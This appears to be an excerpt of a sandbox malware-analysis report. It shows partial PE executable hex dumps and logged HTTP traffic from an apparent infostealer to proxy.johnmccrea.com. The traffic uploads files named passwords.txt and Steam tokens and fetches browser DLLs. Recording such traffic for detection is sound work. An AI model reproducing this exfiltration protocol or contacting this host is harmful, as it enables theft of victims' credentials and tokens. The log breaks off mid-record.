00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Fri, 04 Oct 2024 07:52:42 GMTContent-Type: application/octet-streamContent-Length: 539688Last-Modified: Fri, 04 Oct 2024 07:45:44 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "66ff9d28-83c28"X-Content-Type-Options: nosniffAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 24 b2 eb 8a 60 d3 85 d9 60 d3 85 d9 60 d3 85 d9 b3 a1 86 d8 6c d3 85 d9 b3 a1 80 d8 ca d3 85 d9 b3 a1 81 d8 75 d3 85 d9 a2 52 81 d8 72 d3 85 d9 a2 52 86 d8 74 d3 85 d9 b3 a1 84 d8 65 d3 85 d9 60 d3 84 d9 39 d3 85 d9 a2 52 80 d8 2e d3 85 d9 93 51 8c d8 61 d3 85 d9 93 51 7a d9 61 d3 85 d9 93 51 87 d8 61 d3 85 d9 52 69 63 68 60 d3 85 d9 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 28 9d ff 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 27 00 c8 01 00 00 5a 06 00 00 00 00 00 66 6f 00 00 00 10 00 00 00 e0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 08 00 00 04 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 30 6d 02 00 3c 00 00 00 00 30 08 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 16 08 00 28 26 00 00 00 40 08 00 f0 1a 00 00 78 50 02 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 4f 02 00 40 00 00 00 00 00 00 00 00 00 00 00 00 e0 01 00 34 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 cc c6 01 00 00 10 00 00 00 c8 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 26 94 00 00 00 e0 01 00 00 96 00 00 00 cc 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 b8 a4 05 00 00 80 02 00 00 96 05 00 00 62 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 e0 01 00 00 00 30 08 00 00 02 00 00 00 f8 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 1a 00 00 00 40 08 00 00 1c 00 00 00 fa 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: proxy.johnmccrea.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JEHIJJKEGHJJKECBKECFHost: proxy.johnmccrea.comContent-Length: 256Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 45 48 49 4a 4a 4b 45 47 48 4a 4a 4b 45 43 42 4b 45 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 39 43 33 44 38 37 33 31 30 41 30 32 37 34 30 37 32 35 36 30 38 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 48 49 4a 4a 4b 45 47 48 4a 4a 4b 45 43 42 4b 45 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 35 36 36 61 63 37 62 64 65 61 66 37 36 33 62 62 61 66 37 30 61 61 36 64 35 36 36 37 63 38 30 34 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 48 49 4a 4a 4b 45 47 48 4a 4a 4b 45 43 42 4b 45 43 46 2d 2d 0d 0a Data Ascii: ------JEHIJJKEGHJJKECBKECFContent-Disposition: form-data; name="hwid"49C3D87310A02740725608-a33c7340-61ca------JEHIJJKEGHJJKECBKECFContent-Disposition: form-data; name="build_id"566ac7bdeaf763bbaf70aa6d5667c804------JEHIJJKEGHJJKECBKECF--
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CAKFIJDHJEGIDHJKKKJJHost: proxy.johnmccrea.comContent-Length: 331Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 41 4b 46 49 4a 44 48 4a 45 47 49 44 48 4a 4b 4b 4b 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 39 61 65 64 61 37 37 31 62 64 38 61 62 38 30 33 62 31 36 34 66 38 61 34 61 31 62 64 63 62 62 0d 0a 2d 2d 2d 2d 2d 2d 43 41 4b 46 49 4a 44 48 4a 45 47 49 44 48 4a 4b 4b 4b 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 35 36 36 61 63 37 62 64 65 61 66 37 36 33 62 62 61 66 37 30 61 61 36 64 35 36 36 37 63 38 30 34 0d 0a 2d 2d 2d 2d 2d 2d 43 41 4b 46 49 4a 44 48 4a 45 47 49 44 48 4a 4b 4b 4b 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 31 0d 0a 2d 2d 2d 2d 2d 2d 43 41 4b 46 49 4a 44 48 4a 45 47 49 44 48 4a 4b 4b 4b 4a 4a 2d 2d 0d 0a Data Ascii: ------CAKFIJDHJEGIDHJKKKJJContent-Disposition: form-data; name="token"c9aeda771bd8ab803b164f8a4a1bdcbb------CAKFIJDHJEGIDHJKKKJJContent-Disposition: form-data; name="build_id"566ac7bdeaf763bbaf70aa6d5667c804------CAKFIJDHJEGIDHJKKKJJContent-Disposition: form-data; name="mode"1------CAKFIJDHJEGIDHJKKKJJ--
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BFIIEHJDBKJKECBFHDGHHost: proxy.johnmccrea.comContent-Length: 331Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 46 49 49 45 48 4a 44 42 4b 4a 4b 45 43 42 46 48 44 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 39 61 65 64 61 37 37 31 62 64 38 61 62 38 30 33 62 31 36 34 66 38 61 34 61 31 62 64 63 62 62 0d 0a 2d 2d 2d 2d 2d 2d 42 46 49 49 45 48 4a 44 42 4b 4a 4b 45 43 42 46 48 44 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 35 36 36 61 63 37 62 64 65 61 66 37 36 33 62 62 61 66 37 30 61 61 36 64 35 36 36 37 63 38 30 34 0d 0a 2d 2d 2d 2d 2d 2d 42 46 49 49 45 48 4a 44 42 4b 4a 4b 45 43 42 46 48 44 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 32 0d 0a 2d 2d 2d 2d 2d 2d 42 46 49 49 45 48 4a 44 42 4b 4a 4b 45 43 42 46 48 44 47 48 2d 2d 0d 0a Data Ascii: ------BFIIEHJDBKJKECBFHDGHContent-Disposition: form-data; name="token"c9aeda771bd8ab803b164f8a4a1bdcbb------BFIIEHJDBKJKECBFHDGHContent-Disposition: form-data; name="build_id"566ac7bdeaf763bbaf70aa6d5667c804------BFIIEHJDBKJKECBFHDGHContent-Disposition: form-data; name="mode"2------BFIIEHJDBKJKECBFHDGH--
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DAFHIDGIJKJKECBGDBGHHost: proxy.johnmccrea.comContent-Length: 332Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 41 46 48 49 44 47 49 4a 4b 4a 4b 45 43 42 47 44 42 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 39 61 65 64 61 37 37 31 62 64 38 61 62 38 30 33 62 31 36 34 66 38 61 34 61 31 62 64 63 62 62 0d 0a 2d 2d 2d 2d 2d 2d 44 41 46 48 49 44 47 49 4a 4b 4a 4b 45 43 42 47 44 42 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 35 36 36 61 63 37 62 64 65 61 66 37 36 33 62 62 61 66 37 30 61 61 36 64 35 36 36 37 63 38 30 34 0d 0a 2d 2d 2d 2d 2d 2d 44 41 46 48 49 44 47 49 4a 4b 4a 4b 45 43 42 47 44 42 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 32 31 0d 0a 2d 2d 2d 2d 2d 2d 44 41 46 48 49 44 47 49 4a 4b 4a 4b 45 43 42 47 44 42 47 48 2d 2d 0d 0a Data Ascii: ------DAFHIDGIJKJKECBGDBGHContent-Disposition: form-data; name="token"c9aeda771bd8ab803b164f8a4a1bdcbb------DAFHIDGIJKJKECBGDBGHContent-Disposition: form-data; name="build_id"566ac7bdeaf763bbaf70aa6d5667c804------DAFHIDGIJKJKECBGDBGHContent-Disposition: form-data; name="mode"21------DAFHIDGIJKJKECBGDBGH--
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AKJDGDGDHDGDBFIDHDBAHost: proxy.johnmccrea.comContent-Length: 6757Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET //sql.dll HTTP/1.1Host: proxy.johnmccrea.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AAFIIJDAAAAKFHIDAAAKHost: proxy.johnmccrea.comContent-Length: 4677Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CAAKKFHCFIECAAAKEGCFHost: proxy.johnmccrea.comContent-Length: 1529Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----EGIDAAFIEHIEHJKFHCAEHost: proxy.johnmccrea.comContent-Length: 437Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 47 49 44 41 41 46 49 45 48 49 45 48 4a 4b 46 48 43 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 39 61 65 64 61 37 37 31 62 64 38 61 62 38 30 33 62 31 36 34 66 38 61 34 61 31 62 64 63 62 62 0d 0a 2d 2d 2d 2d 2d 2d 45 47 49 44 41 41 46 49 45 48 49 45 48 4a 4b 46 48 43 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 35 36 36 61 63 37 62 64 65 61 66 37 36 33 62 62 61 66 37 30 61 61 36 64 35 36 36 37 63 38 30 34 0d 0a 2d 2d 2d 2d 2d 2d 45 47 49 44 41 41 46 49 45 48 49 45 48 4a 4b 46 48 43 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 47 46 7a 63 33 64 76 63 6d 52 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 45 47 49 44 41 41 46 49 45 48 49 45 48 4a 4b 46 48 43 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 64 61 74 61 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 45 47 49 44 41 41 46 49 45 48 49 45 48 4a 4b 46 48 43 41 45 2d 2d 0d 0a Data Ascii: ------EGIDAAFIEHIEHJKFHCAEContent-Disposition: form-data; name="token"c9aeda771bd8ab803b164f8a4a1bdcbb------EGIDAAFIEHIEHJKFHCAEContent-Disposition: form-data; name="build_id"566ac7bdeaf763bbaf70aa6d5667c804------EGIDAAFIEHIEHJKFHCAEContent-Disposition: form-data; name="file_name"cGFzc3dvcmRzLnR4dA==------EGIDAAFIEHIEHJKFHCAEContent-Disposition: form-data; name="file_data"------EGIDAAFIEHIEHJKFHCAE--
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KFHJJJKKFHIDAAKFBFBFHost: proxy.johnmccrea.comContent-Length: 437Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 46 48 4a 4a 4a 4b 4b 46 48 49 44 41 41 4b 46 42 46 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 39 61 65 64 61 37 37 31 62 64 38 61 62 38 30 33 62 31 36 34 66 38 61 34 61 31 62 64 63 62 62 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 48 4a 4a 4a 4b 4b 46 48 49 44 41 41 4b 46 42 46 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 35 36 36 61 63 37 62 64 65 61 66 37 36 33 62 62 61 66 37 30 61 61 36 64 35 36 36 37 63 38 30 34 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 48 4a 4a 4a 4b 4b 46 48 49 44 41 41 4b 46 42 46 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 47 46 7a 63 33 64 76 63 6d 52 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 48 4a 4a 4a 4b 4b 46 48 49 44 41 41 4b 46 42 46 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 64 61 74 61 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 48 4a 4a 4a 4b 4b 46 48 49 44 41 41 4b 46 42 46 42 46 2d 2d 0d 0a Data Ascii: ------KFHJJJKKFHIDAAKFBFBFContent-Disposition: form-data; name="token"c9aeda771bd8ab803b164f8a4a1bdcbb------KFHJJJKKFHIDAAKFBFBFContent-Disposition: form-data; name="build_id"566ac7bdeaf763bbaf70aa6d5667c804------KFHJJJKKFHIDAAKFBFBFContent-Disposition: form-data; name="file_name"cGFzc3dvcmRzLnR4dA==------KFHJJJKKFHIDAAKFBFBFContent-Disposition: form-data; name="file_data"------KFHJJJKKFHIDAAKFBFBF--
Source: global traffic HTTP traffic detected: GET //freebl3.dll HTTP/1.1Host: proxy.johnmccrea.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET //mozglue.dll HTTP/1.1Host: proxy.johnmccrea.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET //msvcp140.dll HTTP/1.1Host: proxy.johnmccrea.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET //softokn3.dll HTTP/1.1Host: proxy.johnmccrea.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET //vcruntime140.dll HTTP/1.1Host: proxy.johnmccrea.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET //nss3.dll HTTP/1.1Host: proxy.johnmccrea.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DAFHIDGIJKJKECBGDBGHHost: proxy.johnmccrea.comContent-Length: 1145Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BFIIEHJDBKJKECBFHDGHHost: proxy.johnmccrea.comContent-Length: 331Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 46 49 49 45 48 4a 44 42 4b 4a 4b 45 43 42 46 48 44 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 39 61 65 64 61 37 37 31 62 64 38 61 62 38 30 33 62 31 36 34 66 38 61 34 61 31 62 64 63 62 62 0d 0a 2d 2d 2d 2d 2d 2d 42 46 49 49 45 48 4a 44 42 4b 4a 4b 45 43 42 46 48 44 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 35 36 36 61 63 37 62 64 65 61 66 37 36 33 62 62 61 66 37 30 61 61 36 64 35 36 36 37 63 38 30 34 0d 0a 2d 2d 2d 2d 2d 2d 42 46 49 49 45 48 4a 44 42 4b 4a 4b 45 43 42 46 48 44 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 33 0d 0a 2d 2d 2d 2d 2d 2d 42 46 49 49 45 48 4a 44 42 4b 4a 4b 45 43 42 46 48 44 47 48 2d 2d 0d 0a Data Ascii: ------BFIIEHJDBKJKECBFHDGHContent-Disposition: form-data; name="token"c9aeda771bd8ab803b164f8a4a1bdcbb------BFIIEHJDBKJKECBFHDGHContent-Disposition: form-data; name="build_id"566ac7bdeaf763bbaf70aa6d5667c804------BFIIEHJDBKJKECBFHDGHContent-Disposition: form-data; name="mode"3------BFIIEHJDBKJKECBFHDGH--
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----FIECBFIDGDAKFHIEHJKFHost: proxy.johnmccrea.comContent-Length: 331Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 49 45 43 42 46 49 44 47 44 41 4b 46 48 49 45 48 4a 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 39 61 65 64 61 37 37 31 62 64 38 61 62 38 30 33 62 31 36 34 66 38 61 34 61 31 62 64 63 62 62 0d 0a 2d 2d 2d 2d 2d 2d 46 49 45 43 42 46 49 44 47 44 41 4b 46 48 49 45 48 4a 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 35 36 36 61 63 37 62 64 65 61 66 37 36 33 62 62 61 66 37 30 61 61 36 64 35 36 36 37 63 38 30 34 0d 0a 2d 2d 2d 2d 2d 2d 46 49 45 43 42 46 49 44 47 44 41 4b 46 48 49 45 48 4a 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 34 0d 0a 2d 2d 2d 2d 2d 2d 46 49 45 43 42 46 49 44 47 44 41 4b 46 48 49 45 48 4a 4b 46 2d 2d 0d 0a Data Ascii: ------FIECBFIDGDAKFHIEHJKFContent-Disposition: form-data; name="token"c9aeda771bd8ab803b164f8a4a1bdcbb------FIECBFIDGDAKFHIEHJKFContent-Disposition: form-data; name="build_id"566ac7bdeaf763bbaf70aa6d5667c804------FIECBFIDGDAKFHIEHJKFContent-Disposition: form-data; name="mode"4------FIECBFIDGDAKFHIEHJKF--
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DHIECGCAEBFIIDHIDGIEHost: proxy.johnmccrea.comContent-Length: 461Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 48 49 45 43 47 43 41 45 42 46 49 49 44 48 49 44 47 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 39 61 65 64 61 37 37 31 62 64 38 61 62 38 30 33 62 31 36 34 66 38 61 34 61 31 62 64 63 62 62 0d 0a 2d 2d 2d 2d 2d 2d 44 48 49 45 43 47 43 41 45 42 46 49 49 44 48 49 44 47 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 35 36 36 61 63 37 62 64 65 61 66 37 36 33 62 62 61 66 37 30 61 61 36 64 35 36 36 37 63 38 30 34 0d 0a 2d 2d 2d 2d 2d 2d 44 48 49 45 43 47 43 41 45 42 46 49 49 44 48 49 44 47 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 55 32 39 6d 64 46 78 54 64 47 56 68 62 56 78 7a 64 47 56 68 62 56 39 30 62 32 74 6c 62 6e 4d 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 44 48 49 45 43 47 43 41 45 42 46 49 49 44 48 49 44 47 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 64 61 74 61 22 0d 0a 0d 0a 71 4e 45 34 4d 67 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 44 48 49 45 43 47 43 41 45 42 46 49 49 44 48 49 44 47 49 45 2d 2d 0d 0a Data Ascii: ------DHIECGCAEBFIIDHIDGIEContent-Disposition: form-data; name="token"c9aeda771bd8ab803b164f8a4a1bdcbb------DHIECGCAEBFIIDHIDGIEContent-Disposition: form-data; name="build_id"566ac7bdeaf763bbaf70aa6d5667c804------DHIECGCAEBFIIDHIDGIEContent-Disposition: form-data; 